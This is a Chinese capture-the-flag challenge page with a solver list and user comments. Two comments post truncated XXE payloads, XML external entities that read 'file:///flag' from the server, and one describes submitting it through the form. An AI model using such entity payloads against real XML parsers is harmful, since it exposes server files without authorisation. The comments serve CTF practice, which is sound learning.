评分(0)
暂无评分
解题动态
1424661428 攻破了该题 1天前
caocao 攻破了该题 14天前
minz 攻破了该题 1月前
xujunjjj 攻破了该题 2月前
wbiao 攻破了该题 4月前
nuxe 攻破了该题 4月前
ssoocc 攻破了该题 5月前
倦鸟叫了一整天 攻破了该题 6月前
amobaishi 攻破了该题 10月前
biandanjun 攻破了该题 1年前
tianna 攻破了该题 1年前
coldplay99999 攻破了该题 1年前
Rg 攻破了该题 1年前
WCRH 攻破了该题 1年前
POEighT 攻破了该题 1年前
wangjf 攻破了该题 1年前
t1tl3d 攻破了该题 1年前
fuhuameng 攻破了该题 1年前
cxy18 攻破了该题 1年前
评论
MRLD 1年前
举报
<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE user [ <!ELEMENT name ANY > <!ENTITY admin SYSTEM "file:///flag" >]> <user><userna
MRLD 1年前
举报
真得出生出题人,假flag是真的,闲的这样搞
gooddemo 1年前
举报
这个是xxe漏洞,所以在点击提交按钮时,修改Payload,内容如下:<?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE test [ <!ENTITY xxe SYSTEM "file:///flag">]> <user><use
hopeinhand 2年前
举报
找半天结果假flag是真的,很迷惑